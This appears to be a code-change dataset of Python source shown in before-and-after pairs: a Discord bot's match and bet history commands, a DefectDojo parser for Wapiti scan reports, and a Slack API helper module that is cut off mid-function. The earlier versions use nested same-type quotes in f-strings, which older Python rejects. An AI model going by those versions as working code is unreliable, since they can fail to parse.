# Append match amount
return_text += f'{match.amount}\t'
# If challenger is winner, append crown
if match.challenger.id == match.winner.id:
return_text += f'♕'
# Append challenger display name and vs
return_text += f'{match.challenger.nickname}\t vs \t'
# If recipient is winner, append crown
if match.recipient.id == match.winner.id:
return_text += f'♕'
# Append recipient display name
return_text += f'{match.recipient.nickname}\t'
# Append game[format]
return_text += f'{match.full_game}\t'
# Append match time
return_text += f'{self.utc_to_est(match.match_time).strftime('%x %X')}\n'
return return_text
def generate_bet_text(self, bet: bets.Bet):
return_text = ''
# Append bet amount
return_text += f'{bet.amount}\t'
# Append bet_target
return_text += f'{bet.bet_target.nickname}\t'
# Append won or lost
if bet.bet_target.id == bet.winner.id:
return_text += 'Won\t'
else:
return_text += 'Lost\t'
# Append bet_time
return_text += f'{self.utc_to_est(bet.bet_time).strftime('%x %X')}\n'
return return_text
@commands.command(name='match_history', help='Prints out a users match history')
@commands.guild_only()
async def match_history(self, ctx: commands.Context, member: Union[discord.Member, str] = None,
vs: Union[discord.Member, str] = None):
"""Show match history of user.
Example:
- `$match_history @Sophia'
- `$match_history @Ness'
- `$match_history @Sophia @Ness'
**Arguments**
- `<member>` The user to show the match history of. If omitted, defaults to your own history.
- `<vs>` The user to limit the match history to only games with them
"""
logger.debug(f'match_history: {member}, {vs}')
# Declare player2 as none for failsafe with ma.get_matches_all
player2 = None
# Check if member is None, if it is, set member to ctx.author
if not member:
member = ctx.author
# Check if vs exists, get player2 if it does
if vs:
player2 = acc.get_account(ctx, DbHandler.db_cnc, vs)
# Get player1 and their match history
player1 = acc.get_account(ctx, DbHandler.db_cnc, member)
match_history = ma.get_matches_all(ctx, player1, player2, True)
# Check if match_history is not 0
if not match_history:
await du.code_message(ctx, 'No match history')
return
# Instantiate text and match_list to be appended later
text = ''
match_list = match_history
# Set pages to amount of match_list/10 in an even amount, cur_page to last page, and active to true
text = ''
pages = math.ceil(len(match_list)/10)
cur_page = pages-1
# Used to loop waiting for a react
active = True
# Generate page from match_list
for i in range(cur_page*10, (cur_page*10) + 10):
if i < len(match_list):
text += self.generate_match_text(match_list[i]) # text += str(match_list[i])
# If pages is greater than one, add a page counter, if not set active to False
if pages > 1:
text += f'Page {cur_page+1} of {pages}\n'
else:
active = False
# Create message with return of du.code_message
message = await du.code_message(ctx, text)
# If pages greater than one, add reaction controls
if pages > 1:
await message.add_reaction('\U00002B05') # ⬅️
await message.add_reaction('\U000027A1') # ➡️
# Method to check if react is the correction with the correct user
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in ['\U00002B05', '\U000027A1']
# While loop
while active:
try:
# page set to start of codeblock
page = '```\n'
# wait till we get a reaction, fill reaction, user with output of 'reaction_add'
reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
# If reaction is left and cur_page is greater than 0
if str(reaction.emoji) == '\U00002B05' and cur_page > 0: # ⬅️️
# Set current page to one less than current
cur_page -= 1
# For range of pages for current list append match_list to page
for i in range(cur_page*10, cur_page*10 + 10):
page += self.generate_match_text(match_list[i]) # match_list[i]
# Add page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove users reaction
await message.remove_reaction(reaction, user)
# If reaction is right and cur_page is less than pages-1
elif str(reaction.emoji) == '\U000027A1' and cur_page < pages-1: # ➡️
# Set current page to one more than current
cur_page += 1
# For range of pages for current list append match_list to page
for i in range(cur_page*10, cur_page*10 + 10):
if i < len(match_list):
page += self.generate_match_text(match_list[i]) # match_list[i]
# Add page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove users reaction
await message.remove_reaction(reaction, user)
else:
# Remove reaction if it's anything else
await message.remove_reaction(reaction, user)
except asyncio.TimeoutError:
# When 'reaction_add' throws exception, set active to False to end loop
active = False
# Get cached message to remove reactions
cached_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
for reactions in cached_msg.reactions:
await reactions.remove(self.bot.user)
@match_history.error
async def generic_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await du.code_message(ctx, f"You're missing required argument: {error.param.name}", 3)
await ctx.send_help('match_history')
elif isinstance(error, commands.CheckFailure):
await du.code_message(ctx, f"You're unable to use this command in a dm.", 3)
elif isinstance(error, exception.UnableToRead):
await du.code_message(ctx, f'Error reading {error.attribute}', 3)
elif isinstance(error, exception.UnableToWrite):
await du.code_message(ctx, f"Error writing {error.attribute}", 3)
elif isinstance(error, exception.UnableToDelete):
await du.code_message(ctx, f"Error deleting {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedEmpty):
await du.code_message(ctx, f"Error unexpected empty {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedValue):
await du.code_message(ctx, f"Unexpected value, {error.attribute}", 3)
elif isinstance(error, exception.InvalidNickname):
await du.code_message(ctx, error.message, 3)
@commands.command(name='bet_history', help='Prints out a users bet history')
@commands.guild_only()
async def bet_history(self, ctx, member: Union[discord.Member, str] = None,
bet_target: Union[discord.Member, str] = None):
"""Prints bet history of user
Examples:
- `$bet_history @Sophia'
- `$bet_history @Ness'
- `$bet_history @Sophia @Ness'
**Arguments**
- `<member>` The user to who's bet history you want to print. If omitted defaults to your own history.
- '<bet_target>' The user you want to limit bets on to.
"""
logger.debug(f'bet_history: {member}, {bet_target}')
# Declare bet_target_acc as failsafe for bets.get_bet_all
bet_target_acc = None
# If member is None set member to ctx.author
if not member:
member = ctx.author
# If bet_target is not None, get bet_target info for specific search
if bet_target:
bet_target_acc = acc.get_account(ctx, DbHandler.db_cnc, bet_target)
# Get bettor info and bet_history
bettor = acc.get_account(ctx, DbHandler.db_cnc, member)
bet_history = bets.get_bet_all(ctx, bettor, bet_target_acc, True)
# Check if bet_history is filled
if not bet_history:
await du.code_message(ctx, 'No bet history')
return
# Create variables to be appended
text = ''
bet_list = bet_history
# Set pages to bet_list/10 even, cur_page to pages-1 and active to True
pages = math.ceil(len(bet_list)/10)
cur_page = pages-1
active = True
# Generate first page to be displayed with cur_page
for i in range(cur_page*10, (cur_page*10) + 10):
if i < len(bet_list):
text += self.generate_bet_text(bet_list[i])
# If pages is greater than one, append a page counter
if pages > 1:
text += f'Page {cur_page+1} of {pages}\n'
else:
active = False
# Send message
message = await du.code_message(ctx, text)
# If pages is greater than one add reactions for control
if pages > 1:
await message.add_reaction('\U00002B05')
await message.add_reaction('\U000027A1')
# Function to check if reaction = ctx.author
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in ['\U00002B05', '\U000027A1']
# loop for reaction controls
while active:
try:
# Set page to start of codeblock
page = '```\n'
# wait till we get a reaction, fill reaction, user with output of 'reaction_add'
reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
# Check if reaction is left, and cur_page greater than zero
if str(reaction.emoji) == '\U00002B05' and cur_page > 0: # ⬅️
# Set cur_page to current value minus one
cur_page -= 1
# Generate current page with cur_page
for i in range(cur_page*10, cur_page*10 + 10):
page += self.generate_bet_text(bet_list[i]) # bet_list[i]
# Append page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove user reaction
await message.remove_reaction(reaction, user)
# Check if reaction is right, and cur_page less than pages-1
elif str(reaction.emoji) == '\U000027A1' and cur_page < pages-1: # ➡️
# Set cur_page to current value plus one
cur_page += 1
# Generate current page with cur_page
for i in range(cur_page*10, cur_page*10 + 10):
if i < len(bet_list):
page += self.generate_bet_text(bet_list[i]) # bet_list[i]
# Append page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove user reaction
await message.remove_reaction(reaction, user)
else:
await message.remove_reaction(reaction, user)
except asyncio.TimeoutError:
# When 'reaction_add' gets a timeout, set active to false to end loop
active = False
# Get cached message to remove all reactions
cached_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
for reactions in cached_msg.reactions:
await reactions.remove(self.bot.user)
@bet_history.error
async def generic_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await du.code_message(ctx, f"You're missing required argument: {error.param.name}", 3)
await ctx.send_help('bet_history')
elif isinstance(error, commands.CheckFailure):
await du.code_message(ctx, f"You're unable to use this command in a dm.", 3)
elif isinstance(error, exception.UnableToRead):
await du.code_message(ctx, f'Error reading {error.attribute}', 3)
elif isinstance(error, exception.UnableToWrite):
await du.code_message(ctx, f"Error writing {error.attribute}", 3)
elif isinstance(error, exception.UnableToDelete):
await du.code_message(ctx, f"Error deleting {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedEmpty):
await du.code_message(ctx, f"Error unexpected empty {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedValue):
await du.code_message(ctx, f"Unexpected value, {error.attribute}", 3)
elif isinstance(error, exception.InvalidNickname):
await du.code_message(ctx, error.message, 3)
def setup(bot):
bot.add_cog(HistoryCog(bot))
| import asyncio
import math
import datetime
import logging
from typing import Union
import pytz
import discord
from discord.ext import commands
from database.database_setup import DbHandler
import utils.discord_utils as du
import utils.account as acc
import utils.matches as ma
import utils.bets as bets
import utils.exception as exception
logger = logging.getLogger(f'marble_match.{__name__}')
class HistoryCog(commands.Cog, name='History'):
def __init__(self, bot: commands.Bot):
self.bot = bot
@staticmethod
def utc_to_est(date: datetime.datetime):
"""Returns datetime converted from utc to est
**Arguments**
- `<date>` utc date to be converted to est
"""
date2 = date.replace(tzinfo=pytz.utc).astimezone(pytz.timezone('US/Eastern'))
return pytz.timezone('US/Eastern').normalize(date2)
def generate_match_text(self, match: ma.Match) -> str:
return_text = ''
# Append match amount
return_text += f'{match.amount}\t'
# If challenger is winner, append crown
if match.challenger.id == match.winner.id:
return_text += f'♕'
# Append challenger display name and vs
return_text += f'{match.challenger.nickname}\t vs \t'
# If recipient is winner, append crown
if match.recipient.id == match.winner.id:
return_text += f'♕'
# Append recipient display name
return_text += f'{match.recipient.nickname}\t'
# Append game[format]
return_text += f'{match.full_game}\t'
# Append match time
return_text += f'{self.utc_to_est(match.match_time).strftime("%x %X")}\n'
return return_text
def generate_bet_text(self, bet: bets.Bet):
return_text = ''
# Append bet amount
return_text += f'{bet.amount}\t'
# Append bet_target
return_text += f'{bet.bet_target.nickname}\t'
# Append won or lost
if bet.bet_target.id == bet.winner.id:
return_text += 'Won\t'
else:
return_text += 'Lost\t'
# Append bet_time
return_text += f'{self.utc_to_est(bet.bet_time).strftime("%x %X")}\n'
return return_text
@commands.command(name='match_history', help='Prints out a users match history')
@commands.guild_only()
async def match_history(self, ctx: commands.Context, member: Union[discord.Member, str] = None,
vs: Union[discord.Member, str] = None):
"""Show match history of user.
Example:
- `$match_history @Sophia'
- `$match_history @Ness'
- `$match_history @Sophia @Ness'
**Arguments**
- `<member>` The user to show the match history of. If omitted, defaults to your own history.
- `<vs>` The user to limit the match history to only games with them
"""
logger.debug(f'match_history: {member}, {vs}')
# Declare player2 as none for failsafe with ma.get_matches_all
player2 = None
# Check if member is None, if it is, set member to ctx.author
if not member:
member = ctx.author
# Check if vs exists, get player2 if it does
if vs:
player2 = acc.get_account(ctx, DbHandler.db_cnc, vs)
# Get player1 and their match history
player1 = acc.get_account(ctx, DbHandler.db_cnc, member)
match_history = ma.get_matches_all(ctx, player1, player2, True)
# Check if match_history is not 0
if not match_history:
await du.code_message(ctx, 'No match history')
return
# Instantiate text and match_list to be appended later
text = ''
match_list = match_history
# Set pages to amount of match_list/10 in an even amount, cur_page to last page, and active to true
text = ''
pages = math.ceil(len(match_list)/10)
cur_page = pages-1
# Used to loop waiting for a react
active = True
# Generate page from match_list
for i in range(cur_page*10, (cur_page*10) + 10):
if i < len(match_list):
text += self.generate_match_text(match_list[i]) # text += str(match_list[i])
# If pages is greater than one, add a page counter, if not set active to False
if pages > 1:
text += f'Page {cur_page+1} of {pages}\n'
else:
active = False
# Create message with return of du.code_message
message = await du.code_message(ctx, text)
# If pages greater than one, add reaction controls
if pages > 1:
await message.add_reaction('\U00002B05') # ⬅️
await message.add_reaction('\U000027A1') # ➡️
# Method to check if react is the correction with the correct user
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in ['\U00002B05', '\U000027A1']
# While loop
while active:
try:
# page set to start of codeblock
page = '```\n'
# wait till we get a reaction, fill reaction, user with output of 'reaction_add'
reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
# If reaction is left and cur_page is greater than 0
if str(reaction.emoji) == '\U00002B05' and cur_page > 0: # ⬅️️
# Set current page to one less than current
cur_page -= 1
# For range of pages for current list append match_list to page
for i in range(cur_page*10, cur_page*10 + 10):
page += self.generate_match_text(match_list[i]) # match_list[i]
# Add page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove users reaction
await message.remove_reaction(reaction, user)
# If reaction is right and cur_page is less than pages-1
elif str(reaction.emoji) == '\U000027A1' and cur_page < pages-1: # ➡️
# Set current page to one more than current
cur_page += 1
# For range of pages for current list append match_list to page
for i in range(cur_page*10, cur_page*10 + 10):
if i < len(match_list):
page += self.generate_match_text(match_list[i]) # match_list[i]
# Add page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove users reaction
await message.remove_reaction(reaction, user)
else:
# Remove reaction if it's anything else
await message.remove_reaction(reaction, user)
except asyncio.TimeoutError:
# When 'reaction_add' throws exception, set active to False to end loop
active = False
# Get cached message to remove reactions
cached_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
for reactions in cached_msg.reactions:
await reactions.remove(self.bot.user)
@match_history.error
async def generic_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await du.code_message(ctx, f"You're missing required argument: {error.param.name}", 3)
await ctx.send_help('match_history')
elif isinstance(error, commands.CheckFailure):
await du.code_message(ctx, f"You're unable to use this command in a dm.", 3)
elif isinstance(error, exception.UnableToRead):
await du.code_message(ctx, f'Error reading {error.attribute}', 3)
elif isinstance(error, exception.UnableToWrite):
await du.code_message(ctx, f"Error writing {error.attribute}", 3)
elif isinstance(error, exception.UnableToDelete):
await du.code_message(ctx, f"Error deleting {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedEmpty):
await du.code_message(ctx, f"Error unexpected empty {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedValue):
await du.code_message(ctx, f"Unexpected value, {error.attribute}", 3)
elif isinstance(error, exception.InvalidNickname):
await du.code_message(ctx, error.message, 3)
@commands.command(name='bet_history', help='Prints out a users bet history')
@commands.guild_only()
async def bet_history(self, ctx, member: Union[discord.Member, str] = None,
bet_target: Union[discord.Member, str] = None):
"""Prints bet history of user
Examples:
- `$bet_history @Sophia'
- `$bet_history @Ness'
- `$bet_history @Sophia @Ness'
**Arguments**
- `<member>` The user to who's bet history you want to print. If omitted defaults to your own history.
- '<bet_target>' The user you want to limit bets on to.
"""
logger.debug(f'bet_history: {member}, {bet_target}')
# Declare bet_target_acc as failsafe for bets.get_bet_all
bet_target_acc = None
# If member is None set member to ctx.author
if not member:
member = ctx.author
# If bet_target is not None, get bet_target info for specific search
if bet_target:
bet_target_acc = acc.get_account(ctx, DbHandler.db_cnc, bet_target)
# Get bettor info and bet_history
bettor = acc.get_account(ctx, DbHandler.db_cnc, member)
bet_history = bets.get_bet_all(ctx, bettor, bet_target_acc, True)
# Check if bet_history is filled
if not bet_history:
await du.code_message(ctx, 'No bet history')
return
# Create variables to be appended
text = ''
bet_list = bet_history
# Set pages to bet_list/10 even, cur_page to pages-1 and active to True
pages = math.ceil(len(bet_list)/10)
cur_page = pages-1
active = True
# Generate first page to be displayed with cur_page
for i in range(cur_page*10, (cur_page*10) + 10):
if i < len(bet_list):
text += self.generate_bet_text(bet_list[i])
# If pages is greater than one, append a page counter
if pages > 1:
text += f'Page {cur_page+1} of {pages}\n'
else:
active = False
# Send message
message = await du.code_message(ctx, text)
# If pages is greater than one add reactions for control
if pages > 1:
await message.add_reaction('\U00002B05')
await message.add_reaction('\U000027A1')
# Function to check if reaction = ctx.author
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in ['\U00002B05', '\U000027A1']
# loop for reaction controls
while active:
try:
# Set page to start of codeblock
page = '```\n'
# wait till we get a reaction, fill reaction, user with output of 'reaction_add'
reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
# Check if reaction is left, and cur_page greater than zero
if str(reaction.emoji) == '\U00002B05' and cur_page > 0: # ⬅️
# Set cur_page to current value minus one
cur_page -= 1
# Generate current page with cur_page
for i in range(cur_page*10, cur_page*10 + 10):
page += self.generate_bet_text(bet_list[i]) # bet_list[i]
# Append page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove user reaction
await message.remove_reaction(reaction, user)
# Check if reaction is right, and cur_page less than pages-1
elif str(reaction.emoji) == '\U000027A1' and cur_page < pages-1: # ➡️
# Set cur_page to current value plus one
cur_page += 1
# Generate current page with cur_page
for i in range(cur_page*10, cur_page*10 + 10):
if i < len(bet_list):
page += self.generate_bet_text(bet_list[i]) # bet_list[i]
# Append page counter and edit message with page
page += f'Page {cur_page+1} of {pages}\n```'
await message.edit(content=page)
# Remove user reaction
await message.remove_reaction(reaction, user)
else:
await message.remove_reaction(reaction, user)
except asyncio.TimeoutError:
# When 'reaction_add' gets a timeout, set active to false to end loop
active = False
# Get cached message to remove all reactions
cached_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
for reactions in cached_msg.reactions:
await reactions.remove(self.bot.user)
@bet_history.error
async def generic_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await du.code_message(ctx, f"You're missing required argument: {error.param.name}", 3)
await ctx.send_help('bet_history')
elif isinstance(error, commands.CheckFailure):
await du.code_message(ctx, f"You're unable to use this command in a dm.", 3)
elif isinstance(error, exception.UnableToRead):
await du.code_message(ctx, f'Error reading {error.attribute}', 3)
elif isinstance(error, exception.UnableToWrite):
await du.code_message(ctx, f"Error writing {error.attribute}", 3)
elif isinstance(error, exception.UnableToDelete):
await du.code_message(ctx, f"Error deleting {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedEmpty):
await du.code_message(ctx, f"Error unexpected empty {error.attribute}", 3)
elif isinstance(error, exception.UnexpectedValue):
await du.code_message(ctx, f"Unexpected value, {error.attribute}", 3)
elif isinstance(error, exception.InvalidNickname):
await du.code_message(ctx, error.message, 3)
def setup(bot):
bot.add_cog(HistoryCog(bot))
|
import re
import hashlib
import logging
from urllib.parse import urlparse
from defusedxml.ElementTree import parse
from dojo.models import Endpoint, Finding
logger = logging.getLogger(__name__)
class WapitiParser(object):
"""The web-application vulnerability scanner
see: https://wapiti.sourceforge.io/
"""
def get_scan_types(self):
return ["Wapiti Scan"]
def get_label_for_scan_types(self, scan_type):
return "Wapiti Scan"
def get_description_for_scan_types(self, scan_type):
return "Import XML report"
def get_findings(self, file, test):
tree = parse(file)
# get root of tree.
root = tree.getroot()
# check if it is
if 'report' not in root.tag:
raise ValueError("This doesn't seem to be a valid Wapiti XML file.")
severity_mapping = {
'4': 'Critical',
'3': 'High',
'2': 'Medium',
'1': 'Low',
'0': 'Info',
}
host = root.findtext('report_infos/info[@name="target"]')
if host.endswith("/"):
host = host[:-1]
dupes = dict()
for vulnerability in root.findall('vulnerabilities/vulnerability'):
category = vulnerability.attrib['name']
description = vulnerability.findtext('description')
mitigation = vulnerability.findtext('solution')
# manage references
cwe = None
references = []
for reference in vulnerability.findall('references/reference'):
reference_title = reference.findtext('title')
if reference_title.startswith("CWE"):
cwe = self.get_cwe(reference_title)
references.append(f"* [{reference_title}]({reference.findtext("url")})")
references = "\n".join(references)
for entry in vulnerability.findall('entries/entry'):
title = category + ": " + entry.findtext('info')
# get numerical severity.
num_severity = entry.findtext('level')
if num_severity in severity_mapping:
severity = severity_mapping[num_severity]
else:
severity = "Info"
finding = Finding(
title=title,
description=description,
severity=severity,
mitigation=mitigation,
references=references,
dynamic_finding=True,
static_finding=False,
nb_occurences=1,
)
if cwe:
finding.cwe = cwe
url = urlparse(host)
finding.unsaved_endpoints = [Endpoint(host=url.netloc)]
if url.scheme:
finding.unsaved_endpoints[0].protocol = url.scheme
if url.port:
finding.unsaved_endpoints[0].port = url.port
if entry.findtext('path'):
finding.unsaved_endpoints[0].path = entry.findtext('path')
finding.unsaved_req_resp = [{"req": entry.findtext('http_request'), "resp": ""}]
# make dupe hash key
dupe_key = hashlib.sha256(str(description + title + severity).encode('utf-8')).hexdigest()
# check if dupes are present.
if dupe_key in dupes:
find = dupes[dupe_key]
find.unsaved_endpoints.extend(finding.unsaved_endpoints)
find.unsaved_req_resp.extend(finding.unsaved_req_resp)
find.nb_occurences += finding.nb_occurences
else:
dupes[dupe_key] = finding
return list(dupes.values())
@staticmethod
def get_cwe(val):
# Match only the first CWE!
cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE)
if cweSearch:
return int(cweSearch.group(1))
else:
return None
| import re
import hashlib
import logging
from urllib.parse import urlparse
from defusedxml.ElementTree import parse
from dojo.models import Endpoint, Finding
logger = logging.getLogger(__name__)
class WapitiParser(object):
"""The web-application vulnerability scanner
see: https://wapiti.sourceforge.io/
"""
def get_scan_types(self):
return ["Wapiti Scan"]
def get_label_for_scan_types(self, scan_type):
return "Wapiti Scan"
def get_description_for_scan_types(self, scan_type):
return "Import XML report"
def get_findings(self, file, test):
tree = parse(file)
# get root of tree.
root = tree.getroot()
# check if it is
if 'report' not in root.tag:
raise ValueError("This doesn't seem to be a valid Wapiti XML file.")
severity_mapping = {
'4': 'Critical',
'3': 'High',
'2': 'Medium',
'1': 'Low',
'0': 'Info',
}
host = root.findtext('report_infos/info[@name="target"]')
if host.endswith("/"):
host = host[:-1]
dupes = dict()
for vulnerability in root.findall('vulnerabilities/vulnerability'):
category = vulnerability.attrib['name']
description = vulnerability.findtext('description')
mitigation = vulnerability.findtext('solution')
# manage references
cwe = None
references = []
for reference in vulnerability.findall('references/reference'):
reference_title = reference.findtext('title')
if reference_title.startswith("CWE"):
cwe = self.get_cwe(reference_title)
references.append(f"* [{reference_title}]({reference.findtext('url')})")
references = "\n".join(references)
for entry in vulnerability.findall('entries/entry'):
title = category + ": " + entry.findtext('info')
# get numerical severity.
num_severity = entry.findtext('level')
if num_severity in severity_mapping:
severity = severity_mapping[num_severity]
else:
severity = "Info"
finding = Finding(
title=title,
description=description,
severity=severity,
mitigation=mitigation,
references=references,
dynamic_finding=True,
static_finding=False,
nb_occurences=1,
)
if cwe:
finding.cwe = cwe
url = urlparse(host)
finding.unsaved_endpoints = [Endpoint(host=url.netloc)]
if url.scheme:
finding.unsaved_endpoints[0].protocol = url.scheme
if url.port:
finding.unsaved_endpoints[0].port = url.port
if entry.findtext('path'):
finding.unsaved_endpoints[0].path = entry.findtext('path')
finding.unsaved_req_resp = [{"req": entry.findtext('http_request'), "resp": ""}]
# make dupe hash key
dupe_key = hashlib.sha256(str(description + title + severity).encode('utf-8')).hexdigest()
# check if dupes are present.
if dupe_key in dupes:
find = dupes[dupe_key]
find.unsaved_endpoints.extend(finding.unsaved_endpoints)
find.unsaved_req_resp.extend(finding.unsaved_req_resp)
find.nb_occurences += finding.nb_occurences
else:
dupes[dupe_key] = finding
return list(dupes.values())
@staticmethod
def get_cwe(val):
# Match only the first CWE!
cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE)
if cweSearch:
return int(cweSearch.group(1))
else:
return None
|
"""
Collection of functions for sending and decoding request to or from the slack API
"""
import cgi
import hmac
import json
import time
import base64
import hashlib
import logging
from typing import Tuple, Union, Optional, MutableMapping
from . import HOOK_URL, ROOT_URL, events, methods, exceptions
LOG = logging.getLogger(__name__)
RECONNECT_EVENTS = ("team_migration_started", "goodbye")
"""Events type preceding a disconnection"""
SKIP_EVENTS = ("reconnect_url",)
"""Events that do not need to be dispatched"""
ITERMODE = ("cursor", "page", "timeline")
"""Supported pagination mode"""
def raise_for_status(
status: int, headers: MutableMapping, data: MutableMapping
) -> None:
"""
Check request response status
Args:
status: Response status
headers: Response headers
data: Response data
Raises:
:class:`slack.exceptions.RateLimited`: For 429 status code
:class:`slack.exceptions:HTTPException`:
"""
if status != 200:
if status == 429:
if isinstance(data, str):
error = data
else:
error = data.get("error", "ratelimited")
try:
retry_after = int(headers.get("Retry-After", 1))
except ValueError:
retry_after = 1
raise exceptions.RateLimited(retry_after, error, status, headers, data)
else:
raise exceptions.HTTPException(status, headers, data)
def raise_for_api_error(headers: MutableMapping, data: MutableMapping) -> None:
"""
Check request response for Slack API error
Args:
headers: Response headers
data: Response data
Raises:
:class:`slack.exceptions.SlackAPIError`
"""
if not data["ok"]:
raise exceptions.SlackAPIError(data.get("error", "unknow_error"), headers, data)
if "warning" in data:
LOG.warning("Slack API WARNING: %s", data["warning"])
def decode_body(headers: MutableMapping, body: bytes) -> dict:
"""
Decode the response body
For 'application/json' content-type load the body as a dictionary
Args:
headers: Response headers
body: Response body
Returns:
decoded body
"""
type_, encoding = parse_content_type(headers)
decoded_body = body.decode(encoding)
# There is one api that just returns `ok` instead of json. In order to have a consistent API we decided to modify the returned payload into a dict.
if type_ == "application/json":
payload = json.loads(decoded_body)
else:
if decoded_body == "ok":
payload = {"ok": True}
else:
payload = {"ok": False, "data": decoded_body}
return payload
def parse_content_type(headers: MutableMapping) -> Tuple[Optional[str], str]:
"""
Find content-type and encoding of the response
Args:
headers: Response headers
Returns:
:py:class:`tuple` (content-type, encoding)
"""
content_type = headers.get("content-type")
if not content_type:
return None, "utf-8"
else:
type_, parameters = cgi.parse_header(content_type)
encoding = parameters.get("charset", "utf-8")
return type_, encoding
def prepare_request(
url: Union[str, methods],
data: Optional[MutableMapping],
headers: Optional[MutableMapping],
global_headers: MutableMapping,
token: str,
as_json: Optional[bool] = None,
) -> Tuple[str, Union[str, MutableMapping], MutableMapping]:
"""
Prepare outgoing request
Create url, headers, add token to the body and if needed json encode it
Args:
url: :class:`slack.methods` item or string of url
data: Outgoing data
headers: Custom headers
global_headers: Global headers
token: Slack API token
as_json: Post JSON to the slack API
Returns:
:py:class:`tuple` (url, body, headers)
"""
if isinstance(url, methods):
as_json = as_json or url.value[3]
real_url = url.value[0]
else:
real_url = url
as_json = False
if not headers:
headers = {**global_headers}
else:
headers = {**global_headers, **headers}
payload: Optional[Union[str, MutableMapping]] = None
if real_url.startswith(HOOK_URL) or (real_url.startswith(ROOT_URL) and as_json):
payload, headers = _prepare_json_request(data, token, headers)
elif real_url.startswith(ROOT_URL) and not as_json:
payload = _prepare_form_encoded_request(data, token)
else:
real_url = ROOT_URL + real_url
payload = _prepare_form_encoded_request(data, token)
return real_url, payload, headers
def _prepare_json_request(
data: Optional[MutableMapping], token: str, headers: MutableMapping
) -> Tuple[str, MutableMapping]:
headers["Authorization"] = f"Bearer {token}"
headers["Content-type"] = "application/json; charset=utf-8"
if isinstance(data, events.Message):
payload = data.to_json()
else:
payload = json.dumps(data or {})
return payload, headers
def _prepare_form_encoded_request(
data: Optional[MutableMapping], token: str
) -> MutableMapping:
if isinstance(data, events.Message):
data = data.serialize()
if not data:
data = {"token": token}
elif "token" not in data:
data["token"] = token
return data
def decode_response(status: int, headers: MutableMapping, body: bytes) -> dict:
"""
Decode incoming response
Args:
status: Response status
headers: Response headers
body: Response body
Returns:
Response data
"""
data = decode_body(headers, body)
raise_for_status(status, headers, data)
raise_for_api_error(headers, data)
return data
def find_iteration(
url: Union[methods, str],
itermode: Optional[str] = None,
iterkey: Optional[str] = None,
) -> Tuple[str, str]:
"""
Find iteration mode and iteration key for a given :class:`slack.methods`
Args:
url: :class:`slack.methods` or string url
itermode: Custom iteration mode
iterkey: Custom iteration key
Returns:
:py:class:`tuple` (itermode, iterkey)
"""
if isinstance(url, methods):
if not itermode:
itermode = url.value[1]
if not iterkey:
iterkey = url.value[2]
if not iterkey or not itermode:
raise ValueError("Iteration not supported for: {}".format(url))
elif itermode not in ITERMODE:
raise ValueError("Iteration not supported for: {}".format(itermode))
return itermode, iterkey
def prepare_iter_request(
url: Union[methods, str],
data: MutableMapping,
*,
iterkey: Optional[str] = None,
itermode: Optional[str] = None,
limit: int = 200,
itervalue: Optional[Union[str, int]] = None,
) -> Tuple[MutableMapping, str, str]:
"""
Prepare outgoing iteration request
Args:
url: :class:`slack.methods` item or string of url
data: Outgoing data
limit: Maximum number of results to return per call.
iterkey: Key in response data to iterate over (required for url string).
itermode: Iteration mode (required for url string) (one of `cursor`, `page` or `timeline`)
itervalue: Value for current iteration (cursor hash, page or timestamp depending on the itermode)
Returns:
:py:class:`tuple` (data, iterkey, itermode)
"""
itermode, iterkey = find_iteration(url, itermode, iterkey)
if itermode == "cursor":
data["limit"] = limit
if itervalue:
data["cursor"] = itervalue
elif itermode == "page":
data["count"] = limit
if itervalue:
data["page"] = itervalue
elif itermode == "timeline":
data["count"] = limit
if itervalue:
data["latest"] = itervalue
return data, iterkey, itermode
def decode_iter_request(data: dict) -> Optional[Union[str, int]]:
"""
Decode incoming response from an iteration request
Args:
data: Response data
Returns:
Next itervalue
"""
if "response_metadata" in data:
return data["response_metadata"].get("next_cursor")
elif "paging" in data:
current_page = int(data["paging"].get("page", 1))
max_page = int(data["paging"].get("pages", 1))
if current_page < max_page:
return current_page + 1
elif "has_more" in data and data["has_more"] and "latest" in data:
return data["messages"][-1]["ts"]
return None
def discard_event(event: events.Event, bot_id: str = None) -> bool:
"""
Check if the incoming event needs to be discarded
Args:
event: Incoming :class:`slack.events.Event`
bot_id: Id of connected bot
Returns:
boolean
"""
if event["type"] in SKIP_EVENTS:
return True
elif bot_id and isinstance(event, events.Message):
if event.get("bot_id") == bot_id:
LOG.debug("Ignoring event: %s", event)
return True
elif "message" in event and event["message"].get("bot_id") == bot_id:
LOG.debug("Ignoring event: %s", event)
return True
return False
def need_reconnect(event: events.Event) -> bool:
"""
Check if RTM needs reconnecting
Args:
